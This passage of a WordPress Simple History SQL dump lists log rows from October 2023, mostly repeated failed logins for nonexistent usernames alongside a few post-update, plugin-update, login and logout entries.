06:45:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38704,'2023-10-18 06:47:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38705,'2023-10-18 06:49:00','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38706,'2023-10-18 06:57:19','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38707,'2023-10-18 07:05:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38708,'2023-10-18 07:08:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38709,'2023-10-18 07:11:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38710,'2023-10-18 07:19:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38711,'2023-10-18 07:31:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38712,'2023-10-18 07:35:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38713,'2023-10-18 07:42:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38714,'2023-10-18 07:50:05','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38715,'2023-10-18 07:53:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38716,'2023-10-18 07:59:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38717,'2023-10-18 08:04:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38718,'2023-10-18 08:16:12','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38719,'2023-10-18 08:24:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38720,'2023-10-18 08:27:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38721,'2023-10-18 08:39:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38722,'2023-10-18 08:50:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38723,'2023-10-18 09:01:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38724,'2023-10-18 09:12:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38725,'2023-10-18 09:24:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38726,'2023-10-18 09:27:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38727,'2023-10-18 09:35:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38728,'2023-10-18 09:47:17','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38729,'2023-10-18 09:47:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38730,'2023-10-18 09:58:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38731,'2023-10-18 09:58:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38732,'2023-10-18 10:08:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38733,'2023-10-18 10:09:52','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38734,'2023-10-18 10:19:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38735,'2023-10-18 10:21:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38736,'2023-10-18 10:30:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38737,'2023-10-18 10:32:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38738,'2023-10-18 10:41:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38739,'2023-10-18 10:43:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38740,'2023-10-18 10:52:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38741,'2023-10-18 10:55:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38742,'2023-10-18 11:03:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38743,'2023-10-18 11:06:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38744,'2023-10-18 11:13:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38745,'2023-10-18 11:18:00','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38746,'2023-10-18 11:24:19','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38747,'2023-10-18 11:29:30','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38748,'2023-10-18 11:34:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38749,'2023-10-18 11:40:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38750,'2023-10-18 11:45:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38751,'2023-10-18 11:52:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38752,'2023-10-18 11:57:02','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38753,'2023-10-18 12:03:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38754,'2023-10-18 12:08:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38755,'2023-10-18 12:14:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38756,'2023-10-18 12:19:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38757,'2023-10-18 12:26:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38758,'2023-10-18 12:30:05','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38759,'2023-10-18 12:37:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38760,'2023-10-18 12:38:21','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','47f8759217062f9f7bc21f35b0e82ad3','other'),(38761,'2023-10-18 12:40:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38762,'2023-10-18 12:48:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38763,'2023-10-18 12:51:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38764,'2023-10-18 13:00:02','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38765,'2023-10-18 13:01:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38766,'2023-10-18 13:11:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38767,'2023-10-18 13:12:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38768,'2023-10-18 13:22:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38769,'2023-10-18 13:23:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38770,'2023-10-18 13:34:05','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38771,'2023-10-18 13:34:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38772,'2023-10-18 13:45:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38773,'2023-10-18 13:45:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38774,'2023-10-18 13:56:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38775,'2023-10-18 13:57:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38776,'2023-10-18 14:07:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38777,'2023-10-18 14:08:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38778,'2023-10-18 14:18:52','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38779,'2023-10-18 14:19:17','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38780,'2023-10-18 14:24:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38781,'2023-10-18 14:29:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38782,'2023-10-18 14:30:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38783,'2023-10-18 14:40:19','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38784,'2023-10-18 14:41:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38785,'2023-10-18 14:45:04','SimpleUserLogger','info','Logged in','528752c6331856c09b87588bff413d72','wp_user'),(38786,'2023-10-18 14:48:16','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','29462e706f78989496156927c7f0ad63','wp'),(38787,'2023-10-18 14:51:00','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38788,'2023-10-18 14:53:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38789,'2023-10-18 14:53:47','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','5d60e84124a0c2ee58155ca801676580','other'),(38790,'2023-10-18 14:54:53','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','f7cfe93f3f3b69bda143eef31c6a1f90','other'),(38791,'2023-10-18 15:02:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38792,'2023-10-18 15:04:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38793,'2023-10-18 15:13:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38794,'2023-10-18 15:15:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38795,'2023-10-18 15:24:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38796,'2023-10-18 15:26:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38797,'2023-10-18 15:35:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38798,'2023-10-18 15:38:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38799,'2023-10-18 15:46:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38800,'2023-10-18 15:49:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38801,'2023-10-18 15:49:48','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','4b11e3b2d8e8d35600cb1947733dc256','other'),(38802,'2023-10-18 15:55:58','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','e19a9e6bf1521ff824a4554bee0dd7a3','other'),(38803,'2023-10-18 15:57:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38804,'2023-10-18 16:00:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38805,'2023-10-18 16:08:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38806,'2023-10-18 16:11:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38807,'2023-10-18 16:18:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38808,'2023-10-18 16:23:17','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38809,'2023-10-18 16:29:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38810,'2023-10-18 16:34:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38811,'2023-10-18 16:41:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38812,'2023-10-18 16:46:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38813,'2023-10-18 16:52:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38814,'2023-10-18 16:57:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38815,'2023-10-18 17:08:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38816,'2023-10-18 17:19:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38817,'2023-10-18 17:31:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38818,'2023-10-18 17:42:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38819,'2023-10-18 17:47:16','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','be42aa98b14d9866b3cf0be66a74c3ef','wp'),(38820,'2023-10-18 17:53:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38821,'2023-10-18 18:05:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38822,'2023-10-18 18:16:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38823,'2023-10-18 18:28:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38824,'2023-10-18 18:39:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38825,'2023-10-18 18:51:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38826,'2023-10-18 19:02:17','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38827,'2023-10-18 19:13:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38828,'2023-10-18 19:24:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38829,'2023-10-18 19:36:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38830,'2023-10-18 19:47:31','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38831,'2023-10-18 19:59:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38832,'2023-10-18 20:10:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38833,'2023-10-18 20:21:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38834,'2023-10-18 20:33:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38835,'2023-10-18 20:44:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38836,'2023-10-18 20:55:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38837,'2023-10-18 21:07:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38838,'2023-10-18 21:18:19','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38839,'2023-10-18 21:30:00','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38840,'2023-10-18 21:40:22','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','d64a00cffc9e0a09f7de05a42858fb23','wp'),(38841,'2023-10-18 21:41:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38842,'2023-10-18 21:52:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38843,'2023-10-18 22:04:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38844,'2023-10-18 22:13:29','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','0b458e6358120cc54ba7e0b126c89242','wp'),(38845,'2023-10-18 22:13:30','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','d64a00cffc9e0a09f7de05a42858fb23','wp'),(38846,'2023-10-18 22:14:44','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','0b458e6358120cc54ba7e0b126c89242','wp'),(38847,'2023-10-18 22:15:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38848,'2023-10-18 22:24:58','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','f510ffe2361ec327b006c1e0c325af5e','other'),(38849,'2023-10-18 22:26:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38850,'2023-10-18 22:38:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38851,'2023-10-18 22:49:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38852,'2023-10-18 23:00:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38853,'2023-10-18 23:01:03','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(38854,'2023-10-18 23:12:30','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38855,'2023-10-18 23:23:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38856,'2023-10-18 23:35:31','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38857,'2023-10-18 23:47:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38858,'2023-10-18 23:58:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38859,'2023-10-19 00:02:51','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','fc6fa9006147a77b0d0e1d3393b3620d','other'),(38860,'2023-10-19 00:10:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38861,'2023-10-19 00:21:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38862,'2023-10-19 00:30:37','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','6bf43fdae97d235725cf9d28d238bbea','other'),(38863,'2023-10-19 00:32:56','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','df386cd1c7f1bc15d95876d89220518c','other'),(38864,'2023-10-19 00:32:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38865,'2023-10-19 00:44:19','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38866,'2023-10-19 00:55:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38867,'2023-10-19 01:07:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38868,'2023-10-19 01:18:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38869,'2023-10-19 01:29:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38870,'2023-10-19 01:41:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38871,'2023-10-19 01:52:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38872,'2023-10-19 02:03:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38873,'2023-10-19 02:15:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38874,'2023-10-19 02:26:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38875,'2023-10-19 02:38:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38876,'2023-10-19 02:49:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38877,'2023-10-19 03:00:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38878,'2023-10-19 03:12:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38879,'2023-10-19 03:23:47','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38880,'2023-10-19 03:34:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38881,'2023-10-19 03:46:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38882,'2023-10-19 03:52:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38883,'2023-10-19 03:57:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not 